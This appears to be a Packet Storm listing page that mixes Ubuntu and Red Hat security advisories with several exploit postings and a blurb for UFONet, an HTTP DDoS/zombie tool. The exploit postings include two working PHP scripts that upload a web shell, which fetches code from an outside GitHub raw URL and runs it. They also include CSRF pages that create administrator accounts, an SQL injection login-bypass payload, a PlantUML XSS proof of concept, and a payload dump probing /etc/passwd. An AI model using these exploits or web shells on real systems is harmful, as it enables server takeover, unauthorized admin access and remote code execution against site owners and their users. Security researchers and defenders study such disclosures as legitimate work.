UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.

UFONet 1.9

Ubuntu Security Notice 6980-1 - It was discovered that ImageMagick incorrectly handled certain malformed image files. If a user or automated system using ImageMagick were tricked into opening a specially crafted image, an attacker could exploit this to cause a denial of service or possibly execute code with the privileges of the user invoking the program.

    ==========================================================================Ubuntu Security Notice USN-6980-1August 22, 2024imagemagick vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Several security issues were fixed in ImageMagick.Software Description:- imagemagick: Image manipulation programs and libraryDetails:It was discovered that ImageMagick incorrectly handled certain malformedimage files. If a user or automated system using ImageMagick were trickedinto opening a specially crafted image, an attacker could exploit this tocause a denial of service or possibly execute code with the privileges ofthe user invoking the program.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   imagemagick                     8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagick++-dev                 8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagick++5                    8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagickcore-dev               8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagickwand-dev               8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   libmagickwand5                  8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu Pro   perlmagick                      8:6.7.7.10-6ubuntu3.13+esm8                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6980-1 <https://ubuntu.com/security/notices/USN-6980-1>   CVE-2017-12805, CVE-2017-12806, CVE-2017-13144, CVE-2018-16412,   CVE-2018-16413, CVE-2018-17966, CVE-2018-18016, CVE-2018-18024,   CVE-2018-18025, CVE-2018-20467

Ubuntu Security Notice USN-6980-1

Ubuntu Security Notice 6978-1 - It was discovered that XStream incorrectly handled parsing of certain crafted XML documents. A remote attacker could possibly use this issue to read arbitrary files. Zhihong Tian and Hui Lu found that XStream was vulnerable to remote code execution. A remote attacker could run arbitrary shell commands by manipulating the processed input stream. It was discovered that XStream was vulnerable to server-side forgery attacks. A remote attacker could request data from internal resources that are not publicly available only by manipulating the processed input stream.

    ==========================================================================Ubuntu Security Notice USN-6978-1August 22, 2024libxstream-java vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in XStream.Software Description:- libxstream-java: Java library to serialize objects to XML and back againDetails:It was discovered that XStream incorrectly handled parsing of certaincrafted XML documents. A remote attacker could possibly use this issue toread arbitrary files. (CVE-2016-3674)Zhihong Tian and Hui Lu found that XStream was vulnerable to remote codeexecution. A remote attacker could run arbitrary shell commands bymanipulating the processed input stream. (CVE-2020-26217)It was discovered that XStream was vulnerable to server-side forgeryattacks. A remote attacker could request data from internal resourcesthat are not publicly available only by manipulating the processed inputstream. (CVE-2020-26258)It was discovered that XStream was vulnerable to arbitrary file deletionon the local host. A remote attacker could use this to delete arbitraryknown files on the host as long as the executing process had sufficientrights only by manipulating the processed input stream. (CVE-2020-26259)It was discovered that XStream was vulnerable to denial of service,arbitrary code execution, arbitrary file deletion and server-side forgeryattacks. A remote attacker could cause any of those issues bymanipulating the processed input stream. (CVE-2021-21341, CVE-2021-21342,CVE-2021-21343, CVE-2021-21344, CVE-2021-21345, CVE-2021-21346,CVE-2021-21347, CVE-2021-21348, CVE-2021-21349, CVE-2021-21350,CVE-2021-21351)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS   libxstream-java                 1.4.8-1ubuntu0.1+esm3                                   Available with Ubuntu ProUbuntu 14.04 LTS   libxstream-java                 1.4.7-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6978-1   CVE-2016-3674, CVE-2020-26217, CVE-2020-26258, CVE-2020-26259,   CVE-2021-21341, CVE-2021-21342, CVE-2021-21343, CVE-2021-21344,   CVE-2021-21345, CVE-2021-21346, CVE-2021-21347, CVE-2021-21348,   CVE-2021-21349, CVE-2021-21350, CVE-2021-21351

Ubuntu Security Notice USN-6978-1

PlantUML version 1.2024.6 suffers from a cross site scripting vulnerability.

    #Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)#Date: 23/08/2024#Exploit Author: Hosein Vita#Vendor Homepage: https://plantuml.com/#Version: 1.2024.6#Tested on: LinuxDescription:This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.Proof of Concept:plantumlCopy code@startumldigraph G {  graph [bgcolor="white"];  node [shape=box, style="rounded,filled", color="white"];  heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];}@endumlAlternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:Copy codePK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_VThis proof-of-concept remains stored and can be shared as a link with potential victims.

PlantUML 1.2024.6 Cross Site Scripting

Crime Complaints Reporting Management System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Crime Complaints Reporting Management System 1.0 code injection Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php target.com[+] payload :<?phpfunction file_upload($website) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(      'action' => '',        'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',        'contact' => '00213771818860',        'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'about' => 'Hacked By Indoushka',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $website/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";    echo "(+) Example: php " . $argv[0] . " http://example.com\n";    exit(-1);}$website = $argv[1];file_upload($website);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Crime Complaints Reporting Management System 1.0 Shell Upload

Courier Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Courier Management System 1.0 CSRF add admin Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 6.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"email\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Courier Management System 1.0 Cross Site Request Forgery

Company Visitor Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Company Visitor Management 1.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/cvms/index.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Company Visitor Management 1.0 SQL Injection

CMSsite version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : CMSsite 1.0 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://github.com/VictorAlagwu/CMSsite/archive/master.zip                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 31    Line 40  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'create_post' => '',        'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'post_title' => 'inouva',        'post_category_id' => '123',        'post_tags' => '99',        'post_content' => 'N0_name',        'post_status' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/CMSsite-master/img/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CMSsite 1.0 Shell Upload

Red Hat Security Advisory 2024-5446-03 - Red Hat OpenShift Container Platform release 4.13.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a memory exhaustion vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5446.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.13.48 packages and security update  
Advisory ID:        RHSA-2024:5446-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5446  
Issue date:         2024-08-22  
Revision:           03  
CVE Names:          CVE-2023-45290  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.48 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.48. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:5444

Security Fix(es):

* golang: net/http: memory exhaustion in Request.ParseMultipartForm  
(CVE-2023-45290)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-45290

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268017  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000

Red Hat Security Advisory 2024-5446-03

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Source

Packet Storm